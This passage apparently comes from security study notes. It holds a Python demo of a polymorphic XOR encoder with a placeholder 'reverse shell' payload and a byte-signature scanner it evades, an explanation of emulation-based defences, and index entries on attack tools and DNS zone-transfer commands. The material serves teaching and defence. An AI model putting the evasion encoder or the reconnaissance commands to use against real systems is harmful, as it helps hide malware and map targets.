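    if not key or any(b == 0 for b in key):
        raise ValueError("key bytes must be non-zero, or parts of the payload stay in clear")
    body = xor_bytes(payload, key)
    stub = MAGIC + bytes([len(key)]) + key + len(body).to_bytes(4, "little")
    return stub + body


def run_decoder(blob: bytes) -> bytes:
    """What the prepended stub does at run time: read the key, restore the payload."""
    if blob[:3] != MAGIC:
        raise ValueError("not a stub-wrapped blob")
    key_len = blob[3]
    key = blob[4:4 + key_len]
    n = int.from_bytes(blob[4 + key_len:8 + key_len], "little")
    body = blob[8 + key_len:8 + key_len + n]
    return xor_bytes(body, key)


def signature_match(blob: bytes, signature: bytes) -> bool:
    """A byte-pattern scanner with no emulation: this is what polymorphism evades."""
    return signature in blob


if __name__ == "__main__":
    payload = b"constructed payload: reverse shell goes here"
    a = make_polymorphic(payload)
    b = make_polymorphic(payload)
    print("encoded forms differ:", a != b)
    print("signature in encoded blob:", signature_match(a, b"payload"))
    print("signature after decode:  ", signature_match(run_decoder(a), b"payload"))
```

The caveat built into `make_polymorphic` is the one real encoders hit: a key byte of zero leaves every fourth payload byte untouched, handing the scanner a partial signature. The defender's answer, and the reason the defenses entries point at emulation and behaviour rather than bytes, is that the decoder stub itself is constant enough to signature, or the code can be run in a sandbox until it decodes itself.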
Xplico 3 55 pulls data from the network; can be live or reviewing a capture (offline). Stores the extracted components
xprobe2 2 95 OS fingerprinting tool; better results than nmap but a smaller signature DB; uses fuzzy logic
XSS Shell set up a web server with XSS Shell, plant the hook on a vulnerable site; the victim's browser is compromised
Yoda & Themida 5 19 packing tools that make executables difficult to analyze
ZAP Proxy 4 104, 146-147 supports chained proxies, stores HTML locally, imports SSL client certs, tests for SQLi & XSS
Zenmap 2 80, 84 GUI for Nmap
Zero-day Exploit worms 4 59 e.g. Stuxnet exploited 4 zero-days on Windows target machines
zgrep 1 155-156 search compressed Bro log files without uncompressing them first
Zone Transfer 2 24-27 attacker grabs a dump of the DNS server's records. Uses TCP 53
Zone Transfer Unix dig @[DNS_server_IP] [target_domain] -t AXFR
Zone Transfer Windows nslookup; server [server]; set type=any; ls -d [domain]. Watch it with tcpdump -nn port 53 and host ...